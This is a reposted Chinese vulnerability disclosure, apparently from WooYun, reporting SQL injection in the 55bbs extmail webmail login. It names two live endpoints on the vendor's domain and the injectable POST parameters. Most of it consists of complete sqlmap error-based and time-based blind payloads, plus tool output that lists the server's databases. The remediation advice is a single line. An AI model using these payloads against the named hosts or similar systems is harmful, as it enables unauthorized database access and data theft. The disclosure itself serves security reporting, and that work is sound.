神刀安全网

漏洞标题: 55bbs邮件系统SQL注射

漏洞详情

披露状态:

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

55bbs邮件系统sql注射

详细说明:

55bb邮件系统sql注射

注射链接:

http://pop3.55bbs.com/extmail/cgi/index.cgi

http://smtp.55bbs.com/extmail/cgi/index.cgi

注入参数:

Parameter: domain (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY cl

ause

Payload: username=admin&password=2121&domain=55bbs.com' AND (SELECT 2116 FRO

M(SELECT COUNT(*),CONCAT(0x7162716a71,(SELECT (ELT(2116=2116,1))),0x71787a6b71,F

LOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'mtIe

'='mtIe&nosameip=on

Parameter: username (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY cl

ause

Payload: username=admin' AND (SELECT 8134 FROM(SELECT COUNT(*),CONCAT(0x7162

716a71,(SELECT (ELT(8134=8134,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMAT

ION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tHuA'='tHuA&password=2121&domain=55

bbs.com&nosameip=on

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))XEQZ) AND 'DGq

G'='DGqG&password=2121&domain=55bbs.com&nosameip=on

漏洞证明:

Parameter: domain (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: username=admin&password=2121&domain=55bbs.com' AND (SELECT 3084 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(3084=3084,1))),0x716b627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EkhN'='EkhN&nosameip=on

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: username=admin&password=2121&domain=55bbs.com' AND (SELECT * FROM (SELECT(SLEEP(5)))LJhz) AND 'Vcus'='Vcus&nosameip=on

Parameter: username (POST)

Type: error-based

Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: username=admin' AND (SELECT 7724 FROM(SELECT COUNT(*),CONCAT(0x7170767671,(SELECT (ELT(7724=7724,1))),0x716b627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AqVK'='AqVK&password=2121&domain=55bbs.com&nosameip=on

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))gwoO) AND 'eZmf'='eZmf&password=2121&domain=55bbs.com&nosameip=on

there were multiple injection points, please select the one to use for following injections:

[0] place: POST, parameter: domain, type: Single quoted string (default)

[1] place: POST, parameter: username, type: Single quoted string

[q] Quit

> 0

[17:03:12] [INFO] the back-end DBMS is MySQL

web application technology: Nginx

back-end DBMS: MySQL 5.0

[17:03:12] [INFO] fetching database names

[17:03:12] [INFO] the SQL query used returns 3 entries

[17:03:12] [INFO] resumed: information_schema

[17:03:12] [INFO] resumed: extmail

[17:03:12] [INFO] resumed: test

available databases [3]:

[*] extmail

[*] information_schema

[*] test

漏洞标题:  55bbs邮件系统SQL注射

修复方案:

参数过滤!

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 55bbs邮件系统SQL注射

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮